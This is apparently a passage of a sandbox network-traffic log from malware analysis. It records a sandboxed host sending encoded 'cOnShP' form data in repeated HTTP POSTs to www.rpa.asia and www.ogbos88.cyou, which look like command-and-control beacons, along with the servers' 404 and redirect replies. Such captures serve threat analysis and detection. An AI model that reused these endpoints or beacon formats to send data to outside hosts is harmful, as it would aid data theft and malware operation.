Jan 9, 2025 08:34:59.515542030 CET	384	IN	HTTP/1.1 200 OK content-type: text/html date: Thu, 09 Jan 2025 07:34:59 GMT content-length: 263 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4e 76 41 3d 71 55 77 50 51 50 54 51 6d 54 77 79 69 7a 54 55 26 63 4f 6e 53 68 50 3d 50 31 33 36 62 53 59 77 2f 62 6f 69 6e 36 75 74 45 42 5a 37 50 4c 43 36 38 32 44 59 47 51 48 6b 39 71 4b 4c 65 54 6d 58 72 57 41 65 50 79 61 48 54 53 44 4d 46 6f 61 75 42 54 57 78 30 69 67 31 53 33 43 56 46 73 78 33 30 69 55 74 6a 52 56 51 69 42 79 35 35 49 33 59 70 39 39 47 68 33 6b 6b 38 48 35 48 32 41 45 4d 71 6b 57 42 36 67 6b 69 53 48 41 44 77 50 63 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?NvA=qUwPQPTQmTwyizTU&cOnShP=P136bSYw/boin6utEBZ7PLC682DYGQHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2AEMqkWB6gkiSHADwPc="}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.11.20	49783	160.25.166.123	80

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:35:04.888259888 CET	787	OUT	POST /bwjl/ HTTP/1.1 Host: www.rpa.asia Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.rpa.asia Referer: http://www.rpa.asia/bwjl/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 4f 6e 2f 30 55 6b 30 67 4b 6c 63 67 78 7a 39 6d 75 4f 35 64 48 50 31 76 52 6e 35 43 38 56 44 71 6a 50 65 4b 42 58 6e 66 38 50 4a 78 2b 34 2f 75 68 69 7a 41 35 62 35 36 52 46 57 4d 6e 71 52 37 6b 69 6c 32 34 4d 4a 53 32 63 78 4d 30 55 44 4e 32 67 74 66 6a 68 74 57 56 6f 35 4a 61 48 50 5a 63 31 4b 7a 6f 77 78 4e 41 46 73 53 4c 4d 48 33 5a 51 58 78 68 4a 54 51 49 52 48 72 2f 30 37 6a 42 39 72 68 31 6c 36 52 67 70 66 43 6b 2f 45 75 6d 66 72 7a 75 72 48 30 36 47 4a 6b 48 30 39 44 58 75 62 6b 36 58 4a 65 47 56 2b 42 72 76 70 41 67 33 4b 53 53 6f 38 33 67 6e 37 37 4a 63 61 31 7a 41 3d 3d Data Ascii: cOnShP=On/0Uk0gKlcgxz9muO5dHP1vRn5C8VDqjPeKBXnf8PJx+4/uhizA5b56RFWMnqR7kil24MJS2cxM0UDN2gtfjhtWVo5JaHPZc1KzowxNAFsSLMH3ZQXxhJTQIRHr/07jB9rh1l6RgpfCk/EumfrzurH06GJkH09DXubk6XJeGV+BrvpAg3KSSo83gn77Jca1zA==
Jan 9, 2025 08:35:05.235156059 CET	1289	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 09 Jan 2025 07:35:05 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
Jan 9, 2025 08:35:05.235165119 CET	200	IN	Data Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.11.20	49784	160.25.166.123	80

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:35:07.758378029 CET	807	OUT	POST /bwjl/ HTTP/1.1 Host: www.rpa.asia Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.rpa.asia Referer: http://www.rpa.asia/bwjl/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 4f 6e 2f 30 55 6b 30 67 4b 6c 63 67 6a 43 4e 6d 68 4e 52 64 47 76 31 73 66 48 35 43 70 6c 44 6d 6a 50 61 4b 42 56 4c 50 38 39 64 78 39 63 7a 75 67 67 4c 41 38 62 35 36 65 6c 58 49 34 36 51 57 6b 69 68 45 34 4a 70 53 32 63 6c 4d 30 56 7a 4e 32 54 46 63 78 42 74 55 4f 34 35 48 55 6e 50 5a 63 31 4b 7a 6f 77 4d 67 41 45 45 53 49 38 33 33 61 78 58 79 73 70 54 54 66 68 48 72 70 30 37 76 42 39 71 30 31 6b 6d 37 67 76 44 43 6b 2b 30 75 6d 4f 72 77 67 72 48 74 30 6d 49 4d 50 47 30 37 4f 2b 2f 6d 71 47 38 48 48 41 36 6c 6a 5a 6b 61 39 46 2b 32 52 37 67 46 6b 58 43 54 4c 65 62 75 75 49 4d 76 39 57 7a 31 42 35 7a 58 39 74 74 61 55 6f 63 66 6d 39 49 3d Data Ascii: cOnShP=On/0Uk0gKlcgjCNmhNRdGv1sfH5CplDmjPaKBVLP89dx9czuggLA8b56elXI46QWkihE4JpS2clM0VzN2TFcxBtUO45HUnPZc1KzowMgAEESI833axXyspTTfhHrp07vB9q01km7gvDCk+0umOrwgrHt0mIMPG07O+/mqG8HHA6ljZka9F+2R7gFkXCTLebuuIMv9Wz1B5zX9ttaUocfm9I=
Jan 9, 2025 08:35:08.105010986 CET	1289	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 09 Jan 2025 07:35:07 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
Jan 9, 2025 08:35:08.105021000 CET	200	IN	Data Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.11.20	49785	160.25.166.123	80

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:35:10.628104925 CET	2578	OUT	POST /bwjl/ HTTP/1.1 Host: www.rpa.asia Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.rpa.asia Referer: http://www.rpa.asia/bwjl/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 4f 6e 2f 30 55 6b 30 67 4b 6c 63 67 6a 43 4e 6d 68 4e 52 64 47 76 31 73 66 48 35 43 70 6c 44 6d 6a 50 61 4b 42 56 4c 50 38 39 6c 78 39 70 76 75 69 42 4c 41 2f 62 35 36 58 46 58 4c 34 36 52 55 6b 6b 4a 41 34 4a 74 6f 32 66 64 4d 79 33 4c 4e 77 69 46 63 6f 78 74 55 52 6f 35 4b 61 48 4f 52 63 30 36 33 6f 32 73 67 41 45 45 53 49 2b 76 33 4e 77 58 79 71 70 54 51 49 52 48 6e 2f 30 37 4c 42 39 69 6b 31 6b 69 42 6a 5a 7a 43 6b 65 6b 75 6e 38 44 77 2f 37 48 34 35 47 49 55 50 47 6f 6b 4f 2b 79 58 71 46 68 73 48 48 4f 6c 67 34 56 61 74 45 69 49 45 5a 30 72 74 6a 4f 43 43 76 76 6a 78 4c 63 52 34 77 6e 43 42 75 4c 4d 38 64 56 69 41 4b 63 4a 33 49 72 71 72 78 36 39 46 54 2b 45 78 65 59 34 39 6e 34 30 33 69 45 32 62 38 75 65 70 78 4c 36 4c 59 66 42 59 76 69 63 71 52 70 69 31 56 56 7a 34 50 48 6a 45 72 30 69 68 32 64 37 2b 32 43 59 6c 6c 6f 32 6b 78 46 5a 45 39 5a 6c 65 77 51 5a 32 46 55 72 64 42 45 43 7a 6a 55 51 70 72 49 2b 32 6c 75 38 34 45 62 34 59 33 41 6d 63 53 2b 31 76 68 38 36 59 42 37 [TRUNCATED] Data Ascii: cOnShP=On/0Uk0gKlcgjCNmhNRdGv1sfH5CplDmjPaKBVLP89lx9pvuiBLA/b56XFXL46RUkkJA4Jto2fdMy3LNwiFcoxtURo5KaHORc063o2sgAEESI+v3NwXyqpTQIRHn/07LB9ik1kiBjZzCkekun8Dw/7H45GIUPGokO+yXqFhsHHOlg4VatEiIEZ0rtjOCCvvjxLcR4wnCBuLM8dViAKcJ3Irqrx69FT+ExeY49n403iE2b8uepxL6LYfBYvicqRpi1VVz4PHjEr0ih2d7+2CYllo2kxFZE9ZlewQZ2FUrdBECzjUQprI+2lu84Eb4Y3AmcS+1vh86YB7cDkBc/L+te1Ja/SBLsL+5tSuRd2rSkKy7TGSkcJ3Od3HHSAVpQ+FGOCkUjtVyy474RpR3AJ6mgr5qZVPKTrVQ/X1sC9LVkxJzfbg2If3lv84aN75soJUUgqi44ndrb5JHzdpuAIzVGeOeG78zJ+vowD0Y5lmTvY4zof1N9lyKYzXX0QBpbBvolu7yM56i/TiqZMaHNNS7wqFqr3JS1+vC7AhGtWMjJ6IujVCsRsgK+qUIHWJmgJEJzZVyXSvsjVkfyhhCk916FtrfIt4i2EJtmWOqJI9TKWVFYBLK+i0lnJgTm4Mk9NWb9HemyRHYowXvCTOFWE1H7WUZctYCr7MowHq7SXMBaDml2lodYWp75l6VH5eySNe+lqxnZdpDr2jXSKpcDUV6jwsTkePhvZaT84T+MvaO3waHYRCTFYfyME86lgYlt4dJ58EfwdM8XBu/cmkLl5OU16BTneJScuZ2MHe5dE2VvhIczCcqhjC3CULC19rSMvKRg35UemXW4CCD/3mGYxVJ9C154GPlSEF+dLnqKP5/M0mSxjhvdbcjMh7THfDR7Mtz7AFa1F2pi4jacqEvRD8xeEf0hwQSb7GuAPT2Kjp5dkVb4u2kfY0Llbh/ZkQDNq60vMEkMsSnyIRuWYpcMX3gOqpZp2mQ/dYYHfWcrOLPaTWI+ [TRUNCATED]
Jan 9, 2025 08:35:10.628170967 CET	3867	OUT	Data Raw: 56 35 79 2f 52 44 70 74 5a 7a 32 62 2b 31 6a 37 2b 79 55 35 41 55 42 64 72 53 69 4d 6c 44 52 52 6f 56 65 71 6b 6c 69 67 61 59 65 67 64 76 2b 52 54 73 67 2b 34 73 55 45 2b 33 31 65 2f 4d 6f 30 4a 4d 51 74 75 46 39 58 75 50 30 39 78 4b 4d 6b 68 2f Data Ascii: V5y/RDptZz2b+1j7+yU5AUBdrSiMlDRRoVeqkligaYegdv+RTsg+4sUE+31e/Mo0JMQtuF9XuP09xKMkh/ydEFXUL6Ch06TbOdvPBekA4FyRislw6WhoIoX5dusRWgFfJ43w5Fif4e/udovXehnvfG9LjCS8Cf7MAQPxo3K8IVwLZvz8zjrZ5ti6uaOiQ9T7FHwlnMeo4IGyriuGq3pg9Uklq+QTr+UuiSbfnJxGO++Z0kLwULn
Jan 9, 2025 08:35:10.628180027 CET	1511	OUT	Data Raw: 49 5a 37 2b 59 6c 73 38 4d 4e 65 4d 33 63 62 6a 31 51 77 70 4c 44 35 52 6a 46 43 54 6b 38 42 78 61 5a 64 39 37 37 57 76 32 4d 79 48 45 58 34 58 4d 54 30 79 31 62 68 77 79 62 4b 47 41 4d 59 6f 51 53 6e 4a 71 43 47 4a 55 48 56 7a 77 30 4e 61 39 37 Data Ascii: IZ7+Yls8MNeM3cbj1QwpLD5RjFCTk8BxaZd977Wv2MyHEX4XMT0y1bhwybKGAMYoQSnJqCGJUHVzw0Na97NWzjoDegciFWGj6+oQqiBhimJ92KcsCqE1GrhfsFLeVq2CGzMknTVHx0n7uw4QuAqbk/1HONxnLYfj1CGY+vPGCyUPAiI+3JdkWfLWEWhM1Oi1lVcWR2ioIlTQRVUeTdTrFQoVWxv9xD+3vHzWigsx1fcTJJSNl/V
Jan 9, 2025 08:35:10.970221043 CET	1289	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 09 Jan 2025 07:35:10 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
Jan 9, 2025 08:35:10.970231056 CET	200	IN	Data Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.11.20	49786	160.25.166.123	80

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:35:13.512656927 CET	536	OUT	GET /bwjl/?cOnShP=DlXUXSIcZnIsgzl0u4NtOaZFY3Bzu0GepY2CMnKH5/Z+wLXeqyLz34dEMj2dm6NLuVk54f0N3OpI5VHZ7BJAsS5zdqtXFQ+nWWO+v3ILJktUUuvXcybstOw=&NvA=qUwPQPTQmTwyizTU HTTP/1.1 Host: www.rpa.asia Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 9, 2025 08:35:13.864566088 CET	1289	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 09 Jan 2025 07:35:13 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
Jan 9, 2025 08:35:13.864578962 CET	200	IN	Data Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
74	192.168.11.20	49787	172.67.132.227	80

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:35:18.996968031 CET	799	OUT	POST /kj1o/ HTTP/1.1 Host: www.ogbos88.cyou Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.ogbos88.cyou Referer: http://www.ogbos88.cyou/kj1o/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 58 48 6f 54 6b 49 62 46 31 48 6d 63 52 4e 4d 55 49 62 46 5a 6b 43 7a 6c 55 66 79 74 78 79 67 4e 51 6c 33 48 61 6c 51 57 41 7a 6c 54 61 69 4b 76 72 4f 59 67 6b 44 51 5a 73 46 51 32 41 37 76 4a 42 69 33 58 5a 6f 7a 54 31 63 56 6e 2f 76 66 32 45 32 58 47 51 4d 4e 35 34 37 47 30 79 35 61 58 58 41 36 71 75 32 68 72 46 34 4d 55 5a 63 64 6b 62 46 65 52 4f 61 66 5a 30 6e 5a 45 5a 5a 52 67 4b 74 69 36 30 4f 72 2b 35 44 65 48 76 53 48 34 69 52 50 56 2b 52 37 44 77 35 57 75 52 52 66 58 55 70 34 4d 70 72 36 44 78 77 6a 75 5a 41 73 77 73 49 6d 57 6d 35 43 47 6a 71 51 42 6a 78 4a 4e 76 51 3d 3d Data Ascii: cOnShP=XHoTkIbF1HmcRNMUIbFZkCzlUfytxygNQl3HalQWAzlTaiKvrOYgkDQZsFQ2A7vJBi3XZozT1cVn/vf2E2XGQMN547G0y5aXXA6qu2hrF4MUZcdkbFeROafZ0nZEZZRgKti60Or+5DeHvSH4iRPV+R7Dw5WuRRfXUp4Mpr6DxwjuZAswsImWm5CGjqQBjxJNvQ==
Jan 9, 2025 08:35:19.126074076 CET	810	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 09 Jan 2025 07:35:19 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Thu, 09 Jan 2025 08:35:19 GMT Location: https://ogbos88vip.click Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9uXZnSHp%2FLQBYAOsXekUcOGsnPx3mwRXxdsNzTp1mOWg621ohPiV7NQ29YlmxzPYdn4EHM7AIHpjx1cn7%2F2LFo0E%2FQcIBz1%2BKNVTqS%2BcB4oZVFw80VYSo2wRSihoKM4URzw%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 8ff2bff82e382333-ORD Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 